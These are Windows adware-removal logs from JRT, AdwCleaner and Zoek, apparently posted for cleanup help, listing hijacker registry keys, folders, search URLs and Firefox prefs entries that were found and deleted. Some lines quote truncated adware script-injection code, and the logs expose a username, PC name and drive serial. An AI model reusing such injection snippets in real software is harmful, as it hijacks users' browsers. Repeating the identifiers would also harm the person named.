Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\sizlsearch_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\updatesizlsearch_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\updatesizlsearch_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\updateWebSpades_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\updateWebSpades_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\WebSpades_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\WebSpades_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\sizlsearch_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\sizlsearch_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\updatesizlsearch_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\updatesizlsearch_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\updateWebSpades_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\updateWebSpades_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\WebSpades_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\WebSpades_RASMANCS
 
 
 
~~~ Files
 
Successfully deleted: [File] "C:\Users\Mitey Fresh\appdata\local\google\chrome\user data\default\local storage\http_adultcatfinder.com_0.localstorage"
Successfully deleted: [File] "C:\Users\Mitey Fresh\appdata\local\google\chrome\user data\default\local storage\http_www.azlyrics.com_0.localstorage"
Successfully deleted: [File] "C:\Users\Mitey Fresh\appdata\local\google\chrome\user data\default\local storage\http_www.lyricsmode.com_0.localstorage"
Successfully disinfected: [Shortcut] C:\Users\Mitey Fresh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
Successfully disinfected: [Shortcut] C:\Users\Mitey Fresh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
Successfully disinfected: [Shortcut] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
Successfully disinfected: [Shortcut] C:\Users\Mitey Fresh\AppData\Roaming\microsoft\windows\start menu\Programs\Internet Explorer.lnk
Successfully disinfected: [Shortcut] C:\Users\Mitey Fresh\AppData\Roaming\microsoft\windows\start menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk
 
 
 
~~~ Folders
 
Successfully deleted: [Folder] C:\ProgramData\AApptoU
Successfully deleted: [Folder] C:\ProgramData\grEatisaavIng
Successfully deleted: [Folder] C:\ProgramData\Saveitkeep
Successfully deleted: [Folder] "C:\ProgramData\browse~2"
Successfully deleted: [Folder] "C:\Users\Mitey Fresh\AppData\Roaming\performersoft"
Successfully deleted: [Folder] "C:\Users\Mitey Fresh\AppData\Roaming\suptab"
Successfully deleted: [Folder] "C:\Users\Mitey Fresh\appdata\local\globalupdate"
Successfully deleted: [Folder] "C:\Program Files (x86)\ss.helper"
Successfully deleted: [Folder] "C:\Program Files (x86)\sweetpacks bundle uninstaller"
Successfully deleted: [Folder] "C:\Users\Mitey Fresh\documents\optimizer pro"
 
 
 
~~~ FireFox
 
Successfully deleted: [Folder] C:\Users\Mitey Fresh\AppData\Roaming\mozilla\firefox\profiles\ow597pnn.default\extensions\[email protected]
Successfully deleted: [Folder] C:\Users\Mitey Fresh\AppData\Roaming\mozilla\firefox\profiles\ow597pnn.default\extensions\staged
Successfully deleted: [Registry Value] HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\Extensions\\[email protected]l.com
Successfully deleted the following from C:\Users\Mitey Fresh\AppData\Roaming\mozilla\firefox\profiles\ow597pnn.default\prefs.js
 
user_pref("extensions.nWpQCpk6wsS.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apa
user_pref("extensions.ocqQ4lEIHr3.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apa
Emptied folder: C:\Users\Mitey Fresh\AppData\Roaming\mozilla\firefox\profiles\ow597pnn.default\minidumps [1 files]
 
 
 
~~~ Event Viewer Logs were cleared
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 16/10/2014 at 13:45:42.00
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
- AdwCleaner R[1]
 
# AdwCleaner v4.000 - Report created 16/10/2014 at 14:04:51
# Updated 12/10/2014 by Xplode
# Database : 2014-10-15.7
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Mitey Fresh - KIRRA-PC
# Running from : C:\Users\Mitey Fresh\Desktop\AdwCleaner (1).exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
File Found : C:\END
Folder Found : C:\ProgramData\NetoCaoUoppOn
Folder Found : C:\ProgramData\tperfecctcoupon
Folder Found : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\[email protected]
Folder Found : C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
 
***** [ Scheduled Tasks ] *****
 
Task Found : Optimizer Pro Schedule
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17344
 
 
-\\ Mozilla Firefox v28.0 (en-US)
 
[ow597pnn.default] - Line Found : user_pref("extensions.nWpQCpk6wsS.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf([...]
[ow597pnn.default] - Line Found : user_pref("extensions.ocqQ4lEIHr3.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf([...]
 
-\\ Google Chrome v33.0.1750.117
 
 
*************************
 
AdwCleaner[R0].txt - [10793 octets] - [01/01/2014 16:28:13]
AdwCleaner[R1].txt - [8413 octets] - [16/10/2014 14:04:51]
AdwCleaner[S0].txt - [8455 octets] - [01/01/2014 16:31:10]
 
########## EOF - C:\AdwCleaner\AdwCleaner[R1].txt - [8533 octets] ##########
 
 
- AdwCleaner[R0]
 
# AdwCleaner v3.016 - Report created 01/01/2014 at 16:28:13
# Updated 23/12/2013 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Mitey Fresh - KIRRA-PC
# Running from : C:\Users\Mitey Fresh\Downloads\adwcleaner.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
File Found : C:\END
File Found : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\searchplugins\Web Search.xml
File Found : C:\Windows\System32\Tasks\NCH Software
File Found : C:\Windows\System32\Tasks\UpdaterEX
File Found : C:\Windows\Tasks\UpdaterEX.job
Folder Found : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\staged
Folder Found : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\staged
Folder Found : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\staged
Folder Found C:\Program Files (x86)\DiggiCOupOn
Folder Found C:\Program Files (x86)\Nation Toolbar
Folder Found C:\Program Files (x86)\NCH Software
Folder Found C:\Program Files (x86)\WebSearch
Folder Found C:\ProgramData\Babylon
Folder Found C:\ProgramData\DiggiCOupOn
Folder Found C:\ProgramData\Dowunnloadd keePer
Folder Found C:\ProgramData\NCH Software
Folder Found C:\ProgramData\SearchNewTab
Folder Found C:\Users\Mitey Fresh\AppData\Roaming\NCH Software
Folder Found C:\Users\Mitey Fresh\AppData\Roaming\UpdaterEX
Folder Found C:\Users\MITEYF~1\AppData\Local\Temp\eIntaller
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Data Found : [x64] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~3\BROWSE~1\BROWSE~2.DLL
Key Found : HKCU\Software\AppDataLow\Software\Crossrider
Key Found : HKCU\Software\AppDataLow\SProtector
Key Found : HKCU\Software\BabSolution
Key Found : HKCU\Software\DataMngr
Key Found : HKCU\Software\DataMngr_Toolbar
Key Found : HKCU\Software\InstallCore
Key Found : HKCU\Software\InstalledThirdPartyPrograms
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UpdaterEX
Key Found : HKCU\Software\Nation Toolbar
Key Found : HKCU\Software\NCH Software
Key Found : HKCU\Software\SmartBar
Key Found : HKCU\Software\UpdaterEX
Key Found : [x64] HKCU\Software\BabSolution
Key Found : [x64] HKCU\Software\DataMngr
Key Found : [x64] HKCU\Software\DataMngr_Toolbar
Key Found : [x64] HKCU\Software\InstallCore
Key Found : [x64] HKCU\Software\InstalledThirdPartyPrograms
Key Found : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Key Found : [x64] HKCU\Software\Nation Toolbar
Key Found : [x64] HKCU\Software\NCH Software
Key Found : [x64] HKCU\Software\SmartBar
Key Found : [x64] HKCU\Software\UpdaterEX
Key Found : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\808a8abd34eb15
Key Found : HKLM\SOFTWARE\Classes\AppID\{0A18A436-2A7A-49F3-A488-30538A2F6323}
Key Found : HKLM\SOFTWARE\Classes\AppID\{4277F7CF-0000-46CF-BA49-D624465C4BAB}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{007EFBDF-8A5D-4930-97CC-A4B437CBA777}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Found : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Found : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : HKLM\SOFTWARE\Classes\Prod.cap
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Found : HKLM\Software\DataMngr
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Key Found : HKLM\SOFTWARE\Microsoft\Tracing\SnapDo_RASAPI32
Key Found : HKLM\SOFTWARE\Microsoft\Tracing\SnapDo_RASMANCS
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}
Key Found : HKLM\Software\Nation Toolbar
Key Found : HKLM\Software\NCH Software
Key Found : HKLM\Software\SP Global
Key Found : HKLM\Software\SProtector
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Found : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : [x64] HKLM\SOFTWARE\InstalledThirdPartyPrograms
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.16428
 
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Main [Search Page] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&q={searchTerms}&installDate=28/10/2013
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=hp&installDate=28/10/2013
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Main [Search Bar] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&q={searchTerms}&installDate=28/10/2013
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL] - hxxp://www.qvo6.com/?utm_source=b&utm_medium=cor&utm_campaign=eXQ&utm_content=hp&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304&ts=1380937348
Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL] - hxxp://www.qvo6.com/?utm_source=b&utm_medium=cor&utm_campaign=eXQ&utm_content=hp&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304&ts=1380937348
Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page] - hxxp://websearch.relevantsearch.info/?pid=356&r=2013/10/13&hid=10333777505416917158&lg=EN&cc=AU&unqvl=38
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Search [Default_Search_URL] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&q={searchTerms}&installDate=28/10/2013
Setting Found : HKCU\Software\Microsoft\Internet Explorer\Search [SearchAssistant] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&q={searchTerms}&installDate=28/10/2013
Setting Found : HKCU\Software\Microsoft\Internet Explorer\SearchUrl [Default] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&q={searchTerms}&installDate=28/10/2013
Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchUrl [Default] - hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&q={searchTerms}&installDate=28/10/2013
Setting Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL] - hxxp://www.qvo6.com/?utm_source=b&utm_medium=cor&utm_campaign=eXQ&utm_content=hp&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304&ts=1380937348
Setting Found : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page] - hxxp://www.qvo6.com/?utm_source=b&utm_medium=cor&utm_campaign=eXQ&utm_content=hp&from=cor&uid=WDCXWD5000BEVT-22A0RT0_WD-WXF1A80P6304P6304&ts=1380937348
 
-\\ Mozilla Firefox v24.0 (en-US)
 
[ File : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\prefs.js ]
 
Line Found : user_pref("aol_toolbar.default.homepage.check", false);
Line Found : user_pref("aol_toolbar.default.search.check", false);
Line Found : user_pref("browser.search.defaultenginename", "WebSearch");
Line Found : user_pref("browser.search.defaultenginename,S", "WebSearch");
Line Found : user_pref("browser.search.defaulturl", "hxxp://websearch.relevantsearch.info/?pid=356&r=2013/10/13&hid=10333777505416917158&lg=EN&cc=AU&unqvl=38&l=1&q=");
Line Found : user_pref("browser.search.order.1", "WebSearch");
Line Found : user_pref("browser.search.order.1,S", "WebSearch");
Line Found : user_pref("browser.search.selectedEngine,S", "WebSearch");
Line Found : user_pref("extensions.4lDN.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){win[...]
Line Found : user_pref("extensions.7IQJR.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self==window.top){var script=document.createElement(\"script\");script.t[...]
Line Found : user_pref("extensions.BabylonToolbar.prtkDS", 0);
Line Found : user_pref("extensions.BabylonToolbar.prtkHmpg", 0);
Line Found : user_pref("sweetim.toolbar.previous.browser.search.defaultenginename", "");
Line Found : user_pref("sweetim.toolbar.previous.browser.search.selectedEngine", "");
Line Found : user_pref("sweetim.toolbar.previous.browser.startup.homepage", "");
Line Found : user_pref("sweetim.toolbar.previous.keyword.URL", "");
Line Found : user_pref("sweetim.toolbar.scripts.1.domain-blacklist", "");
Line Found : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_DS", "");
Line Found : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_HP", "");
Line Found : user_pref("sweetim.toolbar.searchguard.enable", "");
Line Found : user_pref("browser.startup.homepage", "hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=hp&installDate=28/10/2013");
Line Found : user_pref("browser.search.selectedEngine", "Web Search");
Line Found : user_pref("keyword.URL", "hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&installDate=28/10/2013&q=");
 
-\\ Google Chrome v31.0.1650.63
 
[ File : C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
 
*************************
 
AdwCleaner[R0].txt - [10575 octets] - [01/01/2014 16:28:13]
 
########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [10636 octets] ##########
 
 
- AdwCleaner[S0]

# AdwCleaner v3.016 - Report created 01/01/2014 at 16:31:10
# Updated 23/12/2013 by Xplode
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
# Username : Mitey Fresh - KIRRA-PC
# Running from : C:\Users\Mitey Fresh\Downloads\adwcleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\ProgramData\Babylon
Folder Deleted : C:\ProgramData\NCH Software
Folder Deleted : C:\ProgramData\DiggiCOupOn
Folder Deleted : C:\ProgramData\Dowunnloadd keePer
Folder Deleted : C:\ProgramData\SearchNewTab
Folder Deleted : C:\Program Files (x86)\Nation Toolbar
Folder Deleted : C:\Program Files (x86)\NCH Software
Folder Deleted : C:\Program Files (x86)\WebSearch
Folder Deleted : C:\Program Files (x86)\DiggiCOupOn
Folder Deleted : C:\Users\MITEYF~1\AppData\Local\Temp\eIntaller
Folder Deleted : C:\Users\Mitey Fresh\AppData\Roaming\NCH Software
Folder Deleted : C:\Users\Mitey Fresh\AppData\Roaming\UpdaterEX
Folder Deleted : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\Extensions\staged
File Deleted : C:\END
File Deleted : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\searchplugins\Web Search.xml
File Deleted : C:\Windows\System32\Tasks\NCH Software
File Deleted : C:\Windows\Tasks\UpdaterEX.job
File Deleted : C:\Windows\System32\Tasks\UpdaterEX
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKLM\SOFTWARE\Classes\Prod.cap
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SnapDo_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\SnapDo_RASMANCS
Key Deleted : HKLM\SOFTWARE\808a8abd34eb15
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{0A18A436-2A7A-49F3-A488-30538A2F6323}
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{4277F7CF-0000-46CF-BA49-D624465C4BAB}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{007EFBDF-8A5D-4930-97CC-A4B437CBA777}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{006EE092-9658-4FD6-BD8E-A21A348E59F5}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE07101B-46D4-4A98-AF68-0333EA26E113}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Deleted : HKCU\Software\BabSolution
Key Deleted : HKCU\Software\DataMngr
[#] Key Deleted : HKCU\Software\DataMngr_Toolbar
Key Deleted : HKCU\Software\InstallCore
Key Deleted : HKCU\Software\InstalledThirdPartyPrograms
Key Deleted : HKCU\Software\Nation Toolbar
Key Deleted : HKCU\Software\NCH Software
Key Deleted : HKCU\Software\SmartBar
Key Deleted : HKCU\Software\UpdaterEX
Key Deleted : HKCU\Software\AppDataLow\SProtector
Key Deleted : HKCU\Software\AppDataLow\Software\Crossrider
Key Deleted : HKLM\Software\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Deleted : HKLM\Software\DataMngr
Key Deleted : HKLM\Software\Nation Toolbar
Key Deleted : HKLM\Software\NCH Software
Key Deleted : HKLM\Software\SP Global
Key Deleted : HKLM\Software\SProtector
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\UpdaterEX
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}
Key Deleted : [x64] HKLM\SOFTWARE\InstalledThirdPartyPrograms
Data Deleted : [x64] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~3\BROWSE~1\BROWSE~2.DLL
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.16428
 
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Search Bar]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
Setting Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
Setting Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Search [Default_Search_URL]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\Search [SearchAssistant]
Setting Restored : HKCU\Software\Microsoft\Internet Explorer\SearchUrl [Default]
Setting Restored : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchUrl [Default]
Setting Restored : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
Setting Restored : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
 
-\\ Mozilla Firefox v24.0 (en-US)
 
[ File : C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\prefs.js ]
 
Line Deleted : user_pref("aol_toolbar.default.homepage.check", false);
Line Deleted : user_pref("aol_toolbar.default.search.check", false);
Line Deleted : user_pref("browser.search.defaultenginename", "WebSearch");
Line Deleted : user_pref("browser.search.defaultenginename,S", "WebSearch");
Line Deleted : user_pref("browser.search.defaulturl", "hxxp://websearch.relevantsearch.info/?pid=356&r=2013/10/13&hid=10333777505416917158&lg=EN&cc=AU&unqvl=38&l=1&q=");
Line Deleted : user_pref("browser.search.order.1", "WebSearch");
Line Deleted : user_pref("browser.search.order.1,S", "WebSearch");
Line Deleted : user_pref("browser.search.selectedEngine,S", "WebSearch");
Line Deleted : user_pref("extensions.4lDN.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self.location.hostname.indexOf('mail.')==-1)\r\n{try{for(i=0;i<5;i++){win[...]
Line Deleted : user_pref("extensions.7IQJR.scode", "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};if(window.self==window.top){var script=document.createElement(\"script\");script.t[...]
Line Deleted : user_pref("extensions.BabylonToolbar.prtkDS", 0);
Line Deleted : user_pref("extensions.BabylonToolbar.prtkHmpg", 0);
Line Deleted : user_pref("sweetim.toolbar.previous.browser.search.defaultenginename", "");
Line Deleted : user_pref("sweetim.toolbar.previous.browser.search.selectedEngine", "");
Line Deleted : user_pref("sweetim.toolbar.previous.browser.startup.homepage", "");
Line Deleted : user_pref("sweetim.toolbar.previous.keyword.URL", "");
Line Deleted : user_pref("sweetim.toolbar.scripts.1.domain-blacklist", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_DS", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_HP", "");
Line Deleted : user_pref("sweetim.toolbar.searchguard.enable", "");
Line Deleted : user_pref("browser.startup.homepage", "hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=hp&installDate=28/10/2013");
Line Deleted : user_pref("browser.search.selectedEngine", "Web Search");
Line Deleted : user_pref("keyword.URL", "hxxp://feed.snapdo.com/?publisher=SnapdoGOblidooYB&dpid=GOB1&co=AU&userid=9cf44940-af9e-4ad7-a0b7-6613cc3276d1&searchtype=ds&installDate=28/10/2013&q=");
 
-\\ Google Chrome v31.0.1650.63
 
[ File : C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
 
*************************
 
AdwCleaner[R0].txt - [10793 octets] - [01/01/2014 16:28:13]
AdwCleaner[S0].txt - [8279 octets] - [01/01/2014 16:31:10]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [8339 octets] ##########
 
 
- Zoek logfile
 
 
Zoek.exe v5.0.0.0 Updated 16-10-2014
Tool run by Mitey Fresh on Thu 16/10/2014 at 14:16:35.51.
Microsoft Windows 7 Home Premium  6.1.7601 Service Pack 1 x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\Mitey Fresh\Desktop\zoek.exe [Scan all users] [Script inserted] 
 
==== System Restore Info ======================
 
16/10/2014 2:18:15 PM Zoek.exe System Restore Point Created Succesfully.
 
==== Installed Programs ======================
 
Adobe AIR  
Adobe Flash Player 15 ActiveX  
Adobe Flash Player 15 Plugin  
Adobe Reader XI (11.0.07)  
Adobe Shockwave Player 12.0  
AGEIA PhysX v7.11.13  
AUSkey software 1.4.4  
Browser AdBlocker  
calibre  
